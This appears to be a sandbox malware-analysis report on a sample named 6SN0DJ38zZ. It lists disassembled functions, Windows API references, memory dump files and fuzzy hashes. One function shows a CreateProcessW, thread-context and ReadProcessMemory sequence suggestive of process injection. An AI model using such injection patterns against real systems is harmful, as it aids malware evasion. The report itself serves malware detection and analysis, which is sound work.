Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 0fe6846ae284ea9fb1d231be5b7860c177f8b5cf1f46f54107d76b970a61d1ff
Instruction ID: c3bd0eb12a23e1d07213fc840efe57a30b4f26311a6345604b3fa6f1282cc04e
Opcode Fuzzy Hash: 0fe6846ae284ea9fb1d231be5b7860c177f8b5cf1f46f54107d76b970a61d1ff
Instruction Fuzzy Hash: 6B81AABCD01A40CFC384EFB9A854659BBE6EBCA316764852A9019CF363E7725486CF11

Function 0098434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00984370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00984415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00984432

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: a8c3c1877a259cf832649cc2306e988d45dbd4066e81079f51dda27676bbd8a6
Instruction ID: a204ee70c9f9989e27e23180e5f54396a6c555fdf77bf0e351502ce521ed0161
Opcode Fuzzy Hash: a8c3c1877a259cf832649cc2306e988d45dbd4066e81079f51dda27676bbd8a6
Instruction Fuzzy Hash: EF318174904702CFD721EF74D88469BBBF8FF99308F00092EE59A82351E7B1A945CB52

Function 009A571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 009A5733

Part of subcall function 009AA16B: __NMSG_WRITE.LIBCMT ref: 009AA192
Part of subcall function 009AA16B: __NMSG_WRITE.LIBCMT ref: 009AA19C

__NMSG_WRITE.LIBCMT ref: 009A573A

Part of subcall function 009AA1C8: GetModuleFileNameW.KERNEL32(00000000,00A433BA,00000104,?,00000001,00000000), ref: 009AA25A
Part of subcall function 009AA1C8: ___crtMessageBoxW.LIBCMT ref: 009AA308

Part of subcall function 009A309F: ___crtCorExitProcess.LIBCMT ref: 009A30A5
Part of subcall function 009A309F: ExitProcess.KERNEL32 ref: 009A30AE

Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28

RtlAllocateHeap.NTDLL(01370000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 5c5dd8ea0470204854024d017fa37ede5dc8ce0232f7e900bba06be7b6f628bb
Instruction ID: 5af26579eeea164758a9ee70f2970881aefb028733854e21691ad8ce143abb8c
Opcode Fuzzy Hash: 5c5dd8ea0470204854024d017fa37ede5dc8ce0232f7e900bba06be7b6f628bb
Instruction Fuzzy Hash: 9101F57A304B01EFDA516774EC82B2E735C8BC3361F620525F505BA182EFB58C4186E0

Function 009E98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009E9548,?,?,?,?,?,00000004), ref: 009E98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009E9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009E98D1
CloseHandle.KERNEL32(00000000,?,009E9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E98D8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
Instruction ID: fd1cb9c3471656cb322567b3a84deea76f9ecbf4c75e88458caf2d75b4bdf81d
Opcode Fuzzy Hash: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
Instruction Fuzzy Hash: 0AE0863214121CBFD7315B94EC09FCA7B19AB06B70F104220FB24794E087B1192397D8

Function 009E8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009E8D1B

Part of subcall function 009A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9A24), ref: 009A2D69
Part of subcall function 009A2D55: GetLastError.KERNEL32(00000000,?,009A9A24), ref: 009A2D7B

_free.LIBCMT ref: 009E8D2C
_free.LIBCMT ref: 009E8D3E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 52387bd832643331ff33c563e9869301e8a5c1988d0ae2f24362c13e4a0e6009
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 7EE017A160164146CB26A6BEAD40B9323EC4F9D352B140D1EB40DD71C7CE64FC8281A8

Function 0098A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 009BFC01

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 87254421d453a170f818d1b73bd6683f3747914b0ba2b0deaf662c84a7c71f41
Instruction ID: 801193b4f17c933c63d4244416caf6fca2fe553fb595f0b7b04ec77de16d969d
Opcode Fuzzy Hash: 87254421d453a170f818d1b73bd6683f3747914b0ba2b0deaf662c84a7c71f41
Instruction Fuzzy Hash: 87225974508301DFDB24EF14C494B6ABBE5BF85314F18896EE89A8B362D735EC45CB82

Function 00984C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00984CBA

Strings

EA06, xrefs: 009BD8CC

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: e3b3f5709b849bd92e3a223415e1e7ce0836696035dab3df8913b24d86d52b74
Instruction ID: 65158c892d53d4daa0c2be65a13e17e5a368b0152c9934031515a7ed844bba1b
Opcode Fuzzy Hash: e3b3f5709b849bd92e3a223415e1e7ce0836696035dab3df8913b24d86d52b74
Instruction Fuzzy Hash: 8B415F31A0425A5BDF21BB64CC517BE7FA59F85300F684475EC86DB3C6D624BD4483A1

Function 00987A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00987AAB
_memmove.LIBCMT ref: 00987B16

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
Instruction ID: 5e9757354d9d2cc1d5f2913fa176ba899e5305adf6bbce95c83d87627931384e
Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
Instruction Fuzzy Hash: 4931AEB1704606AFC704EFA8D8D1E69F3A9FF853107258629E519CB391DB34ED50CB90

Function 009847D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00984834

Part of subcall function 009A336C: __lock.LIBCMT ref: 009A3372
Part of subcall function 009A336C: DecodePointer.KERNEL32(00000001,?,00984849,009D7C74), ref: 009A337E
Part of subcall function 009A336C: EncodePointer.KERNEL32(?,?,00984849,009D7C74), ref: 009A3389

Part of subcall function 009848FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00984915
Part of subcall function 009848FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0098492A

Part of subcall function 00983B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B68
Part of subcall function 00983B3A: IsDebuggerPresent.KERNEL32 ref: 00983B7A
Part of subcall function 00983B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A452F8,00A452E0,?,?), ref: 00983BEB
Part of subcall function 00983B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00983C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00984874

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 301cbca3b7cc6d6c0fbc51a5c2d6b2b5bfed072380a06233fe066c837b0b7cd6
Instruction ID: 1744cdf5d97280bc3a09b7af2bd156c5c74aa62ccd69911706cb06ab58577fa0
Opcode Fuzzy Hash: 301cbca3b7cc6d6c0fbc51a5c2d6b2b5bfed072380a06233fe066c837b0b7cd6
Instruction Fuzzy Hash: 75116F799083059FCB00EFB8D80595ABBE8EFC6750F10851BF04193261DBB19546CB92

Function 009A0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009A571C: __FF_MSGBANNER.LIBCMT ref: 009A5733
Part of subcall function 009A571C: __NMSG_WRITE.LIBCMT ref: 009A573A
Part of subcall function 009A571C: RtlAllocateHeap.NTDLL(01370000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F

std::exception::exception.LIBCMT ref: 009A0DEC
__CxxThrowException@8.LIBCMT ref: 009A0E01

Part of subcall function 009A859B: RaiseException.KERNEL32(?,?,?,00A39E78,00000000,?,?,?,?,009A0E06,?,00A39E78,?,00000001), ref: 009A85F0

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 25e2ee5e778b44c901b0652b0310fd305af615bb9a606b678d5a7870104750d7
Instruction ID: 5d8f7960568086cf1fd5036922789705acc5f97d4ccf55521183331cd39461f3
Opcode Fuzzy Hash: 25e2ee5e778b44c901b0652b0310fd305af615bb9a606b678d5a7870104750d7
Instruction Fuzzy Hash: E3F0A43294031966CF10AAA4EC05BDF77ACEF87311F104865FD08A6291EFB1DA9092D1

Function 009A53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28

__lock_file.LIBCMT ref: 009A53EB

Part of subcall function 009A6C11: __lock.LIBCMT ref: 009A6C34

__fclose_nolock.LIBCMT ref: 009A53F6

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: fb0187e6533920643eb8f918adb2beb454659d5a84387350529efd915bf9cb29
Instruction ID: 171374b66b016898875cef04160c2fa20de39e2588bbb79a3d8ed606d988dfaa
Opcode Fuzzy Hash: fb0187e6533920643eb8f918adb2beb454659d5a84387350529efd915bf9cb29
Instruction Fuzzy Hash: F4F09631A00A04DADF107B6598057AE76E06FC3374F268504E464AB1C1CFBC49415BD1

Function 013FBD1D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 013FC4DB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013FC571
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013FC593

Memory Dump Source

Source File: 00000000.00000002.1288653675.00000000013FA000.00000040.00000020.00020000.00000000.sdmp, Offset: 013FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fa000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction ID: 3eb4337ebad2e49de5c27ecf4b0861d114205fe5c0983f5b655d3ed6511ea620
Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction Fuzzy Hash: 9612CE24E14658C6EB24DF64D8507DEB232EF68300F10A4ED910DEB7A5E77A4E81CF5A

Function 009A0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 009A0CB7

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: c048a491aa4dda3c151c4b743e51f194991c5e9b4d2e4cf0dd18b9d468774a92
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3331B370A001059BC718DF58C484A69FBBAFB9A320B64C7A5E88ACB355D735EDD1DBC0

Function 009BFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 009BFCB7

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f181a5acdbbeca2b41918a97459126c54971bc2cd296e338b227c8c012bfd736
Instruction ID: 89a26b569dba49c2aa36a5dace447ae5a32e8a7b2f3400f48e23840a3c017c41
Opcode Fuzzy Hash: f181a5acdbbeca2b41918a97459126c54971bc2cd296e338b227c8c012bfd736
Instruction Fuzzy Hash: 1441E5745043419FDB24DF14C454B1ABBE1BF89318F1988ACE8998B762C736E845CF92

Function 00987B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00987BB3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0c4d5e9b977afdf04c5ccfa55eb2ab772d5089fa877d8c419248906afd71dbd8
Instruction ID: 53b52e0822958013361c68a162ac7dbc9f2d49b10e5274d4e7dce6fdcd0e112f
Opcode Fuzzy Hash: 0c4d5e9b977afdf04c5ccfa55eb2ab772d5089fa877d8c419248906afd71dbd8
Instruction Fuzzy Hash: 4D210272A04A09EBDB149FA5ED417EABFB9FB54360F308829F486C5190EB30C0D09745

Function 00984DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00984BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00984BEF

Part of subcall function 009A525B: __wfsopen.LIBCMT ref: 009A5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E0F

Part of subcall function 00984B6A: FreeLibrary.KERNEL32(00000000), ref: 00984BA4

Part of subcall function 00984C70: _memmove.LIBCMT ref: 00984CBA

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 1319efe22567015e8cad56a80a55fea8bb0fe970898c179d0b9b769c45f5eb84
Instruction ID: de3ee2906773a4094edcb24aa98f7d2c4d4dbddd68e1080373919bb7b7dd5d18
Opcode Fuzzy Hash: 1319efe22567015e8cad56a80a55fea8bb0fe970898c179d0b9b769c45f5eb84
Instruction Fuzzy Hash: 3811A731600706ABCF25FF74C856FAE77A9AF84710F108829F545A7282EA7599019B91

Function 009BFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 009BFD91

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1a0fe1c6f297d32c024d2f3d173e66de2939697de850a2bb1255643909670356
Instruction ID: 9a1ad245d1419b54edd73a8413872d1d80e863b55f9554b3f3feb9cdc1b7c5fd
Opcode Fuzzy Hash: 1a0fe1c6f297d32c024d2f3d173e66de2939697de850a2bb1255643909670356
Instruction Fuzzy Hash: 67212474908341DFDB24EF64C444B1ABBE0BF89314F09896CF88A97762D731E805CB92

Function 009A4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 009A48A6

Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 13389fc27e04b0f646cbdb27e904292fafd494c18f8b487eb9db6954f59fb5e6
Instruction ID: 4c251109405aa6fb00fd7de54f97c9e2770dfd900b804b5495f3aec55fe3542c
Opcode Fuzzy Hash: 13389fc27e04b0f646cbdb27e904292fafd494c18f8b487eb9db6954f59fb5e6
Instruction Fuzzy Hash: 42F0AF31900649ABDF11AFA89C067AF36A4AFC2325F158414B5249B192DBFC8951DBD1

Function 00984E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E7E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 304a0bc49063b63ca91bca1c363e61b0cdef8d0b288a52bc79b17675cbb03784
Instruction ID: 8de1a2d43242aee3370c48c5348f3a068e785a1431763000efabcb6beaa48cae
